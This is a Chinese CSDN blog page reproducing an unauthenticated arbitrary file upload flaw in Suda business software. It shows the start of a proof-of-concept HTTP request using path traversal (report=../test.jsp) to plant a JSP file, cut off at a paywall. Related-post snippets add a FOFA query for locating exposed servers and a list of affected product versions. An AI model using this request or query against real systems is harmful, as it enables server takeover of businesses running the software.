速达软件全系产品存在任意文件上传漏洞

最新推荐文章于 2025-08-10 21:59:12 发布
最新推荐文章于 2025-08-10 21:59:12 发布
阅读量66 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136634884

漏洞简介

速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷。

漏洞复现

 POST /report/DesignReportSave.jsp?report=../test.jsp HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Core/1.94.199.400 QQBrowser/11.8.5300.400
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-
了解本专栏 订阅专栏 解锁全文 超级会员免费看
速达软件产品存在任意文件上传漏洞 附POC
nnn2188185的博客
12-03 273
速达软件产品存在任意文件上传漏洞 附POC
速达软件产品 RCE漏洞复现
0xSec
11-30 1057
速达软件产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷
漏洞复现-速达软件产品存在任意文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-07 752
漏洞复现速达软件产品任意文件上传漏洞,附带自己写的poc脚本
速达软件产品任意文件上传漏洞
故事讲予风听
12-06 1266
速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM统,项目管理软件,OA统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。
速达软件产品 DesignReportSave 任意文件上传漏洞
qq_36334672的博客
01-31 501
速达A3.cloud BAS、速达A3.cloud STD、速达A30.cloud PRO、速达3000.online PRO、速达A4.cloud BAS、速达A4.cloud STD、速达A40.cloud PRO、速达4000.online PRO、速达A5.cloud STD、速达A50.cloud PRO、速达A70.cloud PRO、速达5000.online PRO、速达7000.online PRO。FOFA:app=“速达软件-公司产品”访问 /625248.jsp。
速达软件产品任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
12-04 400
速达软件产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷。
速达天耀软件任意文件上传漏洞
m0_73334898的博客
10-11 301
fofa: app="速达软件-公司产品"
漏洞复现--速达进存销管理任意文件上传
qq_53003652的博客
12-11 858
速达进存销管理统是一套完整的企业业务管理统,统有机的将企业进货管理、销售管理、仓储管理、财务管理融为一体,有着极好易用性和实用性,面提升了企业的管理能力和工作效率。该产品存在任意文件上传,攻击者看上传木马文件获得服务器权限。访问/test.jsp。
漏洞复现】速达软件存在任意文件上传
失心少年
12-05 718
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!速达软件产品存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷。
【网络安全】入侵检测统 Suricata 概述 | IDS
A Little Bean
08-06 895
Suricata是一款开源的入侵检测与防御统(IDS/IPS),具备网络安全监控能力。它通过规则匹配来识别恶意流量,规则由动作、包头和选项三部分组成。用户可自定义规则以提高检测精度,配置文件采用YAML格式。Suricata会生成两种日志:包含完整元数据的eve.json和仅记录基本信息的fast.log。正确配置Suricata能显著提升网络可见性和威胁检测能力,其灵活性和可定制性使其成为网络安全防护的重要工具。
数字取证和网络安全:了解两者的交叉点和重要性
2302_82041293的博客
08-06 798
当代社会的数字格局在很大程度上依赖于数字取证和网络安全。由于人们对技术和互联网的依赖不断升级,网络威胁和攻击的风险大大增加。了解数字取证和网络安全的交叉点对于保护您和您的组织免受网络威胁至关重要。
符合网络安全的汽车OTA软件更新分发机制
NewCarRen的博客
08-06 852
本文提出了一种基于可信平台模块2.0(TPM2.0)的联网车辆安全OTA更新机制。该方案通过两个安全构建块(SBB)实现:SBB1将后端非对称加密转换为车内对称加密,确保更新传输安全;SBB2基于TPM策略执行更新安装授权,防止降级攻击并验证车辆状态。统将可信计算基(TCB)最小化为仅TPM2.0,能抵御物理和运行时攻击。原型评估显示,该方案符合汽车标准(ISO21434/24089、UNECE155/156),在消息大小(ECC/RSA方案分别为3591/4103字节)和计算时间(1187/992毫秒)
智能体革命:网络安全人的角色重塑与突围指南
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
08-10 709
当GPT-5开始撰写漏洞报告时,我们终于清醒:防御的城墙正在被AI重构。这不是职业的终点,而是进化的契机——放下工具包,拿起指挥棒,在智能体时代建立新的安全秩序。拓展阅读揭秘AI安全框架如何守住智能时代底线(附原报告下载)MCP爆火背后的10安全风险解析深信服安全GPT-助力安全领先一步渗透测试进入AI时代:绿盟人工智能渗透测试平台的三项技术突破关注我,让你在AI Agent时代不掉队!🔥每周更新💡 技术原理图解:一图胜千言,直观呈现技术架构🛠️ 实战案例解析:结合真实项目经验,分享避坑指南。
Web安全】Sql注入之SqlServer和MySQL的区别
qinjilll的博客
08-08 704
SQL注入在SQLServer与MySQL中的差异主要体现在语法特性上:SQLServer使用--注释(需空格)和+连接字符串,而MySQL支持#注释和CONCAT()函数;元数据查询方面,SQLServer通过统视图(如sys.tables),MySQL则使用information_schema;堆叠查询在SQLServer中更易实现,MySQL依赖特定驱动;盲注函数也不同(SQLServer用WAITFOR DELAY,MySQL用SLEEP)。此外,SQLServer可通过xp_cmdshell执行
基于AI的自动驾驶汽车(AI-AV)网络安全威胁缓解框架
NewCarRen的博客
08-06 1024
本研究着重探讨人工智能自动驾驶汽车威胁的解决方案,并通过跨学科框架缓解方法来解决这些问题,该方法帮助社会、国家和个人为不断发展的交通技术、人工智能应用的兴起及其带来的威胁做好准备,尽管这些技术带来了革命性的益处。研究人员提出了一种跨学科方法,该方法融合了战略和弹性方法,涉及交通部门道路安全管理机构以及所有参与联盟的实体,如人工智能自动驾驶汽车制造商、交通利益相关者、立法者、安全倡导者、学术界、地方和外国实体。
功能安全和网络安全的综合保障流程
NewCarRen的博客
08-06 762
本文提出了一种通过半自动化方式创建网络安全档案的方法,旨在解决功能安全和网络安全统开发过程中的协同问题。研究指出,当前功能安全和网络安全团队往往独立工作,导致网络安全档案在开发后期手动创建,存在决策冲突发现晚、设计原理重建困难等问题。作者提出的解决方案包括:1)构建分层的对策模式目录,存储不同粒度的缓解策略及其关联论证片段(C1);2)为具体对策模式补充设计原理和网络安全档案片段(C2);3)开发自动组合这些片段生成完整网络安全档案的方法(C3)。该方法通过在设计早期捕获和重用设计决策,减少手动工作量并
企业网络安全中人工智能(AI)的影响
ITmoster的博客
08-06 697
解决围绕人工智能(AI)使用的安全问题需要多方面的措施,包括适当的安全措施、持续监控以及将人类专业知识与AI能力相结合。通过认识并减轻这些风险,组织可以在利用AI于网络安全领域带来的益处的同时,将其潜在危险降至最低。
DDoS防护中的流量清洗与智能调度:构建网络安全坚实屏障
2301_78078966的博客
08-06 865
​:流量清洗与智能调度的协同,通过​。
微软推出革命性AI安全工具Project IRE,重塑网络安全防御新范式
Bar_artist的博客
08-09 572
Project IRE AI代表了逆向工程领域的技术飞跃,它通过整合传统安全分析工具与前沿AI能力,构建了前所未有的恶意软件检测体。作为微软安全生态统的重要组成部分,Project IRE AI的推出象征着AI在网络安全领域的角色转变——从辅助工具升级为主动防御的核心力量,为自动化威胁检测设立了新行业标准。Project IRE AI带来的不仅是技术升级,更是一场防御理念的革命:从被动响应到主动预防,AI正成为网络安全攻防战中最具决定性的战略要素。核心技术解析:AI驱动的逆向工程革命。
速达软件V5列3.92版本补丁发布
- **SD5000-PRO v3.92**:这个名称可能指向速达软件的另一个列或版本号为3.92的专业版产品,"PRO"可能意味着这是一个功能更加丰富和专业的版本。 2. **补丁的作用和重要性**: - 补丁通常用于修复软件中的漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值